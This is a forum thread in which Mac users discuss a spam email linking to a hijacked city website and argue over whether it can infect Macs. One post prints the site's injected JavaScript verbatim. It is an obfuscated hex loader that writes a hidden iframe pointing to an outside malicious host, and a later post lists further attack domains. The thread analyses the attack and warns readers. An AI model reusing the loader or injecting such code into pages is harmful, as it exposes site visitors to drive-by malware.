[gonk]

Someone got into my yahoo account last night and sent a virus to everyone in my address book. It definitely infects macs. The virus is an email with no subject, and the link that people are clicking on that gets them infected is to "cityofalexander.org". DO NOT GO TO THAT WEBSITE!!!!!! I just want to know if anyone knows what this is and what to do about it. Thanks.

[Chito]

It definitely infects macs.

Doubtful.

[OreoCookie]

Very, very improbable. It would be the first and without doubt it'd be in the news all over the internet.

[turtle777]

Well, I went on cityofalexander.org.

I ignored the two warning opo-ups from Safari, and then the page loads.

Nothing else happens. I guess I'm dead now

-t

[gonk]

Are you joking? Why would you do that? In any event, I did not post the full URL. If you just go to the domain, I don't know what will happen. Still, you shouldn't do it! The one person I know of that says she got some damage from the virus says it messed up her address book, and she is on a mac, so I take that to mean it can infect macs. I was just hoping that someone here might know something about it. I know there was some talk of some new mac virus a month or so ago and I don't know if this was it or not, or how to clean it off.

[turtle777]

Originally Posted by gonk 

Are you joking? Why would you do that? In any event, I did not post the full URL. If you just go to the domain, I don't know what will happen. Still, you shouldn't do it! The one person I know of that says she got some damage from the virus says it messed up her address book, and she is on a mac, so I take that to mean it can infect macs. I was just hoping that someone here might know something about it. I know there was some talk of some new mac virus a month or so ago and I don't know if this was it or not, or how to clean it off.

That's bullsh!t, and I'll prove you wrong.

Give me the full URL, I'll go there and then post a screenshot.

This whole "virus for Mac while surfing" is FUD.

-t

[OreoCookie]

She probably mistook a popup claiming `something really, really bad has happened' for the real thing.

[turtle777]

Most likely. My mom did the same thing.

-t

[gonk]

No, first she said that new addresses were added to her address book. Then those addresses (and mine) disappeared from her address book. Also, now, when she attempts to type my address into the "to" line of mail.app, it puts some new address there instead of mine, one that she does not recognize. She is 600 miles away (give or take) so I can't look at her computer and figure out what the problem is. (She also said her trash can was filling up with stuff, and she emptied the trash, and then more stuff was put in it. We have resolved this problem and it is not related to this virus or malicious website.) But the other issue with the addressbook being messed up still hasn't been resolved. (I mean, it's easy enough to fix the address book, the real question is, what caused it, and how do we get rid of it?) Yes, it's entirely possible that the addressbook was already messed up, (or got messed up some other way) but she sends me email pretty often and it's strange that this would happen right at the same time that this hack happened. I was posting here hoping that others knew about this problem and could help, even if it turns out not to be mac related. I only post it here because we know (or at least think) that this infected at least one mac.

@turtle - NO, i will not post the full URL here. I don't want to be accused of spreading this around. It's obvious this is not a well known (or widespread) problem, which is what I was trying to find out.

[0157988944]

Thats a pretty crappy virus if all it does is change address book listings... and 99% chance it's not a virus, a trojan at best which requires the user to provide a password and allow it to install.

[ghporter]

gonk, check your private messages.

There is a lot of mention of a HOAX Mac virus affecting address books, from May or earlier. There is an AppleScript exploit from 2001 that uses address book entries to spread itself, but that's been taken care of by fixes to OS X. Version 10.0 I think, or maybe OS X 10.1.

[seanc]

I don't think there's anything wrong with that website.

The most likely issue is that the website/hosting space was hijacked - either through poor security or outdated software.
Either way, it loads a perfectly fine looking, albeit, dated website and doesn't try to run anything.

[gonk]

@ghporter

Okay, check your PM.

And the OS they are running is 10.5.

[ghporter]

First off, the URL ends in a reference to an ".exe" file-these are Windows executable files and they do NOTHING on Macs. Second, the site is marked as an attack site, which is reported by both Safari and Firefox on Macs, even though the Windows executable file is not dangerous to Macs. Third, that executable is a 28k byte file that has as its internal name "DrWeb32.exe", which is a known WINDOWS sham antivirus attack file.

There is NOTHING in the site, or in the file that can by themselves hurt Mac computers. There is NOTHING in the directory in that URL that can hurt a Mac-aside from the Windows executable file it only has a bunch of .gif files and a couple of subdirectories that have a JavaScript in them. That script is the same in every location. Here it is:

Code:
var i,y,x="3c696672616d65207372633d22687474703a2f2f656c656374726f6e69637373656e73652d7365617263682e636f6d2f6367692d62696e2f696e6465782e6367693f757365723322206672616d65626f726465723d223022207374796c653d22646973706c61793a6e6f6e65223e3c2f696672616d653e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);

This is apparently a JavaScript attack, but it has to be opened in a browser or something else that can execute JavaScript.

Basically, if you go past the "Warning, this is an Attack Site" warnings, you MIGHT have a script attack loaded on your computer. But it would have to have YOUR PERMISSION to do anything bad. In fact, you'd have to work at it to get anything on this site to do anything at all to a Mac-there is nothing at all in any of those directories that can hurt your Mac without YOUR help.

[CharlesS]

Hey, every once in a while a security hole shows up that allows these things to do bad stuff without permission. Whether or not that's the case right now, I don't think it's a good idea to go encouraging people to ignore the security warnings.

[ghporter]

Originally Posted by CharlesS 

Hey, every once in a while a security hole shows up that allows these things to do bad stuff without permission. Whether or not that's the case right now, I don't think it's a good idea to go encouraging people to ignore the security warnings.

I wasn't encouraging anyone to ignore the warnings. The only way you can get to the content on these pages is to ignore the warnings, which was my point. As soon as that big "Attack Site" warning shows up, you should be looking for the back button. It takes completely ignoring the warning to get to the (can't do anything to a Mac) executable file. There's nothing in any of those directories that would even load a web page, just download the executable, which of course cannot do anything at all on a Mac.

[DCJ001]

Originally Posted by gonk 

Are you joking? Why would you do that? In any event, I did not post the full URL. If you just go to the domain, I don't know what will happen. Still, you shouldn't do it! The one person I know of that says she got some damage from the virus says it messed up her address book, and she is on a mac, so I take that to mean it can infect macs. I was just hoping that someone here might know something about it. I know there was some talk of some new mac virus a month or so ago and I don't know if this was it or not, or how to clean it off.

Your passion for doing the right thing, by reporting what you believe to be a harmful situation, is appreciated. This message board has a lot of true experts and some sarcastic wanna-be know-it-alls. Your task is done.

If anyone wishes to play with the site, it's up to them.

[CharlesS]

The part I took issue with was this:

Originally Posted by ghporter 

Basically, if you go past the "Warning, this is an Attack Site" warnings, you MIGHT have a script attack loaded on your computer. But it would have to have YOUR PERMISSION to do anything bad. In fact, you'd have to work at it to get anything on this site to do anything at all to a Mac-there is nothing at all in any of those directories that can hurt your Mac without YOUR help.

This is all well and good, until a new exploit turns up that can hurt your Mac without YOUR help or YOUR PERMISSION, through some as-yet-undiscovered security hole. There's been a few of them in the past, and there's no guarantee there won't be more in the future, so I think it's a better policy just to heed the security warnings, regardless of whether it affects your particular Mac or not.

[gonk]

Originally Posted by ghporter 

First off, the URL ends in a reference to an ".exe" file-these are Windows executable files and they do NOTHING on Macs.

Except, as I read the URL (and I am NOT claiming to be an expert on URLs), it is making a request to run the exe on the server, not on the user's computer. Of course, I don't know what is going to happen after that, but the fact that there is an exe in the URL isn't really relevant if that exe is running on the server and not the user's computer, right? The URL doesn't really end in exe, as you put it, but .exe?blahblahblah (I don't remember what comes after the question mark, but it was a comma-delimited list of numbers.) Doesn't that cause the exe to run on the server, and not the user's computer? If so, it doesn't matter what computer the user is using.

Basically, if you go past the "Warning, this is an Attack Site" warnings, you MIGHT have a script attack loaded on your computer. But it would have to have YOUR PERMISSION to do anything bad. In fact, you'd have to work at it to get anything on this site to do anything at all to a Mac-there is nothing at all in any of those directories that can hurt your Mac without YOUR help.

If I understand you, you're saying a person who isn't tech savy, who believes she got an email from a trusted person sending her to this site, just needs to click past one or two warning dialogs to have her computer compromised? Or are you saying the person would have to do real technical work to make the thing dangerous to a mac?

Let's say one did give this thing permission to run it's attack, what would it do? Do the people I know that have clicked on it need to do anything about it?

[ghporter]

I want to emphasize that I was trying to stress that the warnings are there, and that it is not a good thing to ignore them. DO NOT GO PAST SUCH WARNINGS. I did so in a relatively safe environment with certain safeguards in place to investigate the claims that there was a Mac virus laying in wait there. "Trained professional" and all that (yes, I am a trained computer security specialists). If I've given anyone the impression that I was advocating ignoring the "attack site" warnings, I apologize-that was NOT my intention. The warnings are there for a reason, and especially as CharlesS points out, if someone DOES come up with a Mac exploit, these warnings may be your only way of avoiding it.

Again, DO NOT IGNORE YOUR BROWSER'S WARNINGS. In this case it was not a problem, but tomorrow it could be. Remember, I'm the guy that says the Mac user community is too smug and not suspicious enough-expect there to eventually be Mac threats. This one isn't one.

[ghporter]

Originally Posted by gonk 

Except, as I read the URL (and I am NOT claiming to be an expert on URLs), it is making a request to run the exe on the server, not on the user's computer. Of course, I don't know what is going to happen after that, but the fact that there is an exe in the URL isn't really relevant if that exe is running on the server and not the user's computer, right? The URL doesn't really end in exe, as you put it, but .exe?blahblahblah (I don't remember what comes after the question mark, but it was a comma-delimited list of numbers.) Doesn't that cause the exe to run on the server, and not the user's computer? If so, it doesn't matter what computer the user is using.

Nope. The URL simply asks to download the file. The "blahblahblah" is irrelevant in this case, and may actually be window dressing.

Originally Posted by gonk 

If I understand you, you're saying a person who isn't tech savy, who believes she got an email from a trusted person sending her to this site, just needs to click past one or two warning dialogs to have her computer compromised? Or are you saying the person would have to do real technical work to make the thing dangerous to a mac?

First, these warnings are FULL SCREEN RED BANNERS that basically scream "YOU'RE ABOUT TO DO SOMETHING VERY BAD." Not simple dialog boxes. And you have to look closely to see how you can get past them. They are honestly VERY hard to misinterpret. There are ways to run this sort of file on a Mac, but you have to work at setting them up, and you have to allow them to run. None of this is automatic. Further, the kind of code used in this particular file won't do anything on a Mac, even if you let it, because it's built on low-level Windows functions.

Originally Posted by gonk 

Let's say one did give this thing permission to run it's attack, what would it do? Do the people I know that have clicked on it need to do anything about it?

On your Mac? Nothing at all, as I said above. Under Windows, it masquerades as an antivirus program or update and then downloads some files which themselves can be malicious-but the specific files downloaded are dependent on which implementation is installed. It's nasty but manageable with any REAL antivirus package, especially the pay packages such as Norton or McAfee.

[gonk]

"It's nasty but manageable with any REAL antivirus package, especially the pay packages such as Norton or McAfee."


Ok, thanks a lot for you help. Is Ad-aware a program you'd put in this category?

[Spheric Harlot]

Since Ad-Aware is only available for Windows, I'd not put it in this category.

[gonk]

Originally Posted by Spheric Harlot 

Since Ad-Aware is only available for Windows, I'd not put it in this category.

I'm pretty sure he was talking about windows virus protection software at that point. At least, that's how I read it.

[Spheric Harlot]

Ack.

Mea culpa.

[cgc]

Did you get one of those fake AV warning popups that had a link you click on to "solve" the problem (e.g. install a virus)?

[turtle777]

Originally Posted by cgc 

Did you get one of those fake AV warning popups that had a link you click on to "solve" the problem (e.g. install a virus)?

No, most likely, he just got the Safari warning. Everything else is hearsay.

Just enter the URL, and you'll see it.

-t

[gonk]

Originally Posted by cgc 

Did you get one of those fake AV warning popups that had a link you click on to "solve" the problem (e.g. install a virus)?

I didn't go to the web site and I'm not planning on doing so. The person who did go said she got some kind of warning, and so she didn't go any further. But then, her address book got messed up somehow. In particular, whenever she types my name into the "to" field of an email, it inserts some Chinese email address in addition to mine. (When I say "Chinese", I mean it ends in ".cn".) She is saying that this only started happening today, after she went to that site, so it seems unlikely that the two events are unrelated, but ghporter is saying that site couldn't have done anything to her mac, so I don't know what's going on here.

[ghporter]

Originally Posted by gonk 

"It's nasty but manageable with any REAL antivirus package, especially the pay packages such as Norton or McAfee."


Ok, thanks a lot for you help. Is Ad-aware a program you'd put in this category?

Originally Posted by Spheric Harlot 

Since Ad-Aware is only available for Windows, I'd not put it in this category.

Originally Posted by gonk 

I'm pretty sure he was talking about windows virus protection software at that point. At least, that's how I read it.

I was talking about Windows and Ad Aware is NOT an antivirus package-it's an adware tracking and blocking package. In Windows, go with the free ClamAV (but you may have to wait for updates on emerging threats), or spend the money and get a higher end package like Norton AV or McAfee. Both Norton and McAfee come out with new virus defs very early on their detection. I prefer Norton's interface, but it's more expensive.

And again, if you're using a Mac, this particular issue is no threat at all.

[gonk]

Originally Posted by ghporter 

I was talking about Windows and Ad Aware is NOT an antivirus package-it's an adware tracking and blocking package. In Windows, go with the free ClamAV (but you may have to wait for updates on emerging threats), or spend the money and get a higher end package like Norton AV or McAfee. Both Norton and McAfee come out with new virus defs very early on their detection. I prefer Norton's interface, but it's more expensive.

And again, if you're using a Mac, this particular issue is no threat at all.

OK, thanks.

[mIcahluthier11]

The same thing happened to me yesterday. I've also had problems with getting booted off the net. From what I've read in the past couple of hours a trojan got placed in the leaked Erin Anderson ESPN video and affects both pc and mac.The name of the trojan was OSX/Jahlav-C. That being said does anyone have any leads on any free anti virus apps for 10.5.6? Sorry I looked this up at work's computer so i can't site my info

[Spheric Harlot]

ClamXAV

[ghporter]

The trojan cited above is another example of social engineering of Mac users-MacFixIt has a great little article on it.

I particularly like this passage in the article:

Originally Posted by MacFixIt

The best course of action for Mac users is to examine the files they download carefully, especially if you are being asked for your administrator password to install codecs, utilities, or any other unfamiliar application. Most malware resides on disreputable or untrusted Web sites such as pornography sites or in illegally downloaded software packages. Currently there are no self-propagating viruses for the Mac.

In other words, the world is not all safe and wholesome for Mac users, and especially if you download "stuff you shouldn't download," you're playing into malware purveyors' hands.

[TheoCryst]

Originally Posted by ghporter 

I particularly like this passage in the article:In other words, the world is not all safe and wholesome for Mac users, and especially if you download "stuff you shouldn't download," you're playing into malware purveyors' hands.

Yep, and this type of thing is bound to get worse as OS X builds up its marketshare. Remember: NO operating system is 100% bulletproof, and every OS is vulnerable to these trojans.

[Spheric Harlot]

Make it idiot-proof, and someone will make a better idiot.

[és:]

Originally Posted by gonk 

It definitely infects macs.

This is the part that gets people's back up.

[Spheric Harlot]

Indeed. "Macs" ought to be capitalized.

[turtle777]

I dream of the day where trojans are NOT called viruses any more *sigh*

-t

[ghporter]

turtle, in some parts of Texas, soft drinks are generically called "Cokes." As in "what kind of Coke can I get 'ya?" "Oh, gimme a Dr. Pepper. Mighty kind of you..." In other words, the popular press has made the common term for malware "virus," even though that's only one type of malware. That you know better and I know better won't fix the popular press-who, in thinking they're aiming at a "lowest common denominator" are constantly pushing that denominator lower and lower.

Dream on, but don't bet on a change.

[turtle777]

Originally Posted by ghporter 

Dream on, but don't bet on a change.

YOU could make a change.

Just hand out temp-bans for misuse of the term virus, and people will learn

-t

[Gavin]

Originally Posted by ghporter 

turtle, in some parts of Texas, soft drinks are generically called "Cokes." As in "what kind of Coke can I get 'ya?" "Oh, gimme a Dr. Pepper. Mighty kind of you..."

It's the same in California.

Except the conversation is more like:

Dude, ya want a coke?
Dude, right on!
Like... what kind?
Orange Crush me, dude.

[ghporter]

Originally Posted by turtle777 

YOU could make a change.

Just hand out temp-bans for misuse of the term virus, and people will learn

-t

That kind of "act locally" sort of thing will only work temporarily, and I'd have to do the same sort of "corrective action" so frequently that it would lose its impact. I (or you) can still correct those who misuse terms, much the same way that many of us correct "MAC" posters. I think that's much more effective than anything harsh.

[ghporter]

Originally Posted by Gavin 

It's the same in California.

Except the conversation is more like:

Dude, ya want a coke?
Dude, right on!
Like... what kind?
Orange Crush me, dude.

DUDE! Like AWESOME!

[cvisors]

Ahh fun another drive by download..

I work in the hosting industry and seeing these sorts of things is getting all too common. The poor city of Alexander, has most likely looking at the site had it's ftp details stolen. Though this is a nice chunk of java script. Now I haven't seen an exploit like this for Mac os X as of yet. Though if the truth be known it's only a matter of time, that something like this will happen. And woe and doom and rains of brimstone and fire!

Well not really that bad, but we as a (and I use this term loosely) have been pretty smug over the fact that there hasn't really been any viruses or trojans that don't require user intervention to get into ones machine.

But as the Mac becomes more popular, and becomes a greater target it will happen, just a matter of time really.

Anyway. The major issue right now in the windows world is not so much windows itself. Though it's security model could be much improved (I am looking forward to seeing how much it has been improved in Windows 7.)

But it seems that the most recent flaws that have caused the issue which is seen by the iframes been inserted in webpages, are exploits in adobe acrobat and flash.

This site is no different other than the iframes i've seen except in nasty nasty java script. Just looking at the page with the inspector going I can see that the block of JS code is trying to open a number of sites.

The first is fragus-test.com which resolves to an IP address in Russia. The next is esli.tw which is hosted in the Netherlands. Next we have electronicssense-search.com, which is a domain registered to an US entity hosted at theplanet. I will prolly fire off an email to the planet, as they are pretty responsive.

So we have three sites trying to run dangerous code on the end user machine via the java script that has been inserted into the page.

But wait, thats not all.

next we have an iframe like the ones I've seen many of recently. Again another .tw domain which resolves to an IP in the Netherlands. These all seem to be something like domainname.xom/in.cgi?3 or something like that.

Now next we have the same thing, but pointing to a domain best-med-shop.com (no longer active) again this looks similar to the other iframe style exploits. Or could be used to spam google.

And finally another iframe. Fun!

*sigh* there is too much of this going on right now, and those machines that do get exploited if they have ftp details for the machines owners site. Another site gets exploited.

The "Warning: Visiting this site may harm your computer" pages are just whack a mole really. By the time it's listed in stop bad ware the damage is done.

~Ivy
Vk3IVY